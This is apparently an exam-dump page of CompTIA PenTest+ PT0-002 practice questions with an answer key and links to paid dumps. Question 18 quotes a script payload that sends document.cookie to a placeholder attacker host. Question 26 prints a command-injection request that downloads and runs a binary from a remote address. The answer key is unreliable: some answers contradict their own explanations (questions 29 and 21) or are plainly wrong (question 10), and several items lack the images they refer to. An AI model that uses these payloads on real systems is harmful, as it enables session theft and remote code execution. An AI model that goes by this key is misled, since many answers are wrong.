Certification Topics of PT0-002 Exam PDF Recently Updated Questions
PT0-002 Exam Prep Guide: Prep guide for the PT0-002 Exam
The registration process of the CompTIA PT0-002 Certification Exam
The steps to get registered for the PT0-002 Certification Exam, explained in the PT0-002 Dumps are as follows:
Now, you will be redirected to the registration page of the PT0-002 exam, fill in the required details and click on the submit button.
Enter the required details in the given fields of the CompTIA website, and After filling in all the required details, click on the submit button.
Go to the official website of the CompTIA and click on the link to the PT0-002 Certification Exam.
You will be redirected to the CompTIA's official website, click on the link of the PT0-002 Certification Exam.
After paying the exam fee, you will receive a confirmation message from the CompTIA. CompTIA PT0-002 Certification Exam is being delivered by the Pearson VUE. You can take it either online or onsite.
Obtaining the CompTIA PenTest+ certification (PT0-002) demonstrates a candidate's expertise in assessing potential security risks in any organization. It helps to boost the career prospects of the candidate as the certification is globally recognized, and it gives the candidates' confidence to offer ethical hacking services to any organization. Additionally, the certification can help candidates earn a higher salary as salaries for cybersecurity professionals have been steadily increasing due to the high demand in the industry.
NEW QUESTION # 10
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
- A. Run nmap with the -o, -p22, and -sC options set against the target
- B. Run nmap with the --script vulners option set against the target
- C. Run nmap with the -sV and -p22 options set against the target
- D. Run nmap with the -sA option set against the target
Answer: A
NEW QUESTION # 11
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A. Option C
- B. Option D
- C. Option B
- D. Option A
Answer: D
NEW QUESTION # 12
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.
Which of the following attack types is MOST concerning to the company?
- A. Session riding
- B. Cybersquatting
- C. Data flooding
- D. Side channel
Answer: D
Explanation:
Explanation
https://www.techtarget.com/searchsecurity/definition/side-channel-attack#:~:text=Side%2Dchannel%20attacks%
NEW QUESTION # 13
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?
- A. Review SIP traffic from an on-path position to look for indicators of compromise
- B. Test with proof-of-concept code from an exploit database
- C. Utilize an nmap -sV scan against the service
- D. Manually check the version number of the VoIP service against the CVE release
Answer: B
NEW QUESTION # 14
The results of an Nmap scan are as follows:
Which of the following would be the BEST conclusion about this device?
- A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
- B. This device is most likely a gateway with in-band management services.
- C. This device is most likely a proxy server forwarding requests over TCP/443.
- D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
Answer: B
Explanation:
Explanation
The heart bleed bug is an open ssl bug which does not affect SSH Ref:
https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh
NEW QUESTION # 15
A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?
- A. Continue the assessment.
- B. Terminate the contract.
- C. Scan the 8-bit block to map additional missed hosts.
- D. Update the ROE with new signatures. Most Voted
Answer: D
NEW QUESTION # 16
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
- A. Linux
- B. Android
- C. Windows
- D. Apple
Answer: C
Explanation:
Explanation
The ping -A command sends an ICMP echo request with a specified TTL value and displays the response.
The TTL value indicates how many hops the packet can traverse before being discarded. Different OSs have different default TTL values for their packets. Windows uses 128, Apple uses 64, Linux uses 64 or 255, and Android uses 64. Therefore, a packet with a TTL of 128 is most likely from a Windows OS.
NEW QUESTION # 17
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
- A. The reverse-engineering team may have a history of selling exploits to third parties.
- B. The reverse-engineering team will be given access to source code for analysis.
- C. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
- D. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
Answer: B
NEW QUESTION # 18
Given the following code:<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Session tokens
- B. Base64 encoding
- C. Web-application firewall
- D. Output encoding
- E. Parameterized queries
- F. Input validation
Answer: D,F
Explanation:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
NEW QUESTION # 19
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?
- A. Acceptance by the client and sign-off on the final report
- B. Scheduling of follow-up actions and retesting
- C. Attestation of findings and delivery of the report
- D. Review of the lessons learned during the engagement
Answer: A
NEW QUESTION # 20
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 21
A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?
- A. Obstructing the motion sensors in the hallway of the records room
- B. Climbing in an open window of the adjoining building
- C. Presenting a false employee ID to the night guard
- D. Prying the lock open on the records room
Answer: B
Explanation:
Explanation
The terms of engagement state that the penetration test should not include circumventing the alarm or performing destructive entry, which rules out options A and D. Option C is also not allowed, as it involves social engineering, which is not part of the scope. Option B is the only one that does not violate the terms of engagement, as it uses an open door from an adjoining building to gain access to the records room. This can help the penetration tester to test the physical security of the electronic records without breaking any rules.
NEW QUESTION # 22
Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?
- A. WinDbg
- B. OllyDbg
- C. Peach
- D. GDB
Answer: D
Explanation:
Explanation
OLLYDBG, WinDBG, and IDA are all debugging tools that support Windows environments. GDB is a Linuxspecific debugging tool.
NEW QUESTION # 23
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
- A. Contact law enforcement.
- B. Assume the alert is from the penetration test.
- C. Deconflict with the penetration tester.
- D. Halt the penetration test.
Answer: C
Explanation:
Explanation
Deconflicting with the penetration tester is the best thing to do next after the security alarms are triggered during a penetration test, as it will help determine whether the alarm was caused by the tester's activity or by an actual threat. Deconflicting is the process of communicating and coordinating with other parties involved in a penetration testing engagement, such as security teams, network administrators, or emergency contacts, to avoid confusion or interference.
NEW QUESTION # 24
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
- A. Look for open ports.
- B. Listen for a reverse shell.
- C. Attempt to flood open ports.
- D. Create an encrypted tunnel.
Answer: A
NEW QUESTION # 25
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Walt for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
- A. Run nmap -Pn -sV -script vuln <IP address>.
- B. Perform a credentialed scan with Nessus.
- C. Create a script in the Lua language and use it with NSE.
- D. Employ an OpenVAS simple scan against the TCP port of the host.
Answer: C
NEW QUESTION # 26
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
- A. taskkill /IM "apache" /F
- B. chmod 600 /tmp/apache
- C. grep -v apache ~/.bash_history > ~/.bash_history
- D. rm -rf /tmp/apache
Answer: D
NEW QUESTION # 27
In Python socket programming, SOCK_DGRAM type is:
- A. matrixed.
- B. connectionless.
- C. slower.
- D. reliable.
Answer: B
Explanation:
Explanation
Connectionless due to the Datagram portion mentioned so that would mean its using UDP.
NEW QUESTION # 28
Deconfliction is necessary when the penetration test:
- A. uncovers indicators of prior compromise over the course of the assessment.
- B. proceeds in parallel with a criminal digital forensic investigation.
- C. occurs during the monthly vulnerability scanning.
- D. determines that proprietary information is being stored in cleartext.
Answer: A
Explanation:
This will then enable the PenTest to continue so that additional issues can be found, exploited, and analyzed.
NEW QUESTION # 29
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?
- A. Encrypt and store any client information for future analysis
- B. Report any findings to regulatory oversight groups
- C. Publish the findings after the client reviews the report
- D. Follow the established data retention and destruction process
Answer: A
Explanation:
Explanation
After completing an assessment and providing the report and evidence to the client, it is important to follow the established data retention and destruction process to ensure the confidentiality of the client's information.
This process typically involves securely deleting or destroying any data collected during the assessment that is no longer needed, and securely storing any data that needs to be retained. This helps to prevent unauthorized access to the client's information and protects the client's confidentiality.
Reporting any findings to regulatory oversight groups may be necessary in some cases, but it should be done only with the client's permission and in accordance with any relevant legal requirements. Publishing the findings before the client has reviewed the report is also not recommended, as it may breach the client's confidentiality and damage their reputation. Encrypting and storing client information for future analysis is also not recommended unless it is necessary and in compliance with any legal or ethical requirements.
NEW QUESTION # 30
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
- A. List processes.
- B. Change the MAC address
- C. Spawn a local shell.
- D. Disable NIC.
Answer: C
Explanation:
Explanation
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.
NEW QUESTION # 31
......
2023 New Preparation Guide of CompTIA PT0-002 Exam: https://www.prepawayete.com/CompTIA/PT0-002-practice-exam-dumps.html
PT0-002 Practice Exam - 310 Unique Questions: https://drive.google.com/open?id=1_EYXkI35QGYVghfvRxUdSNR7L8Hb8ydj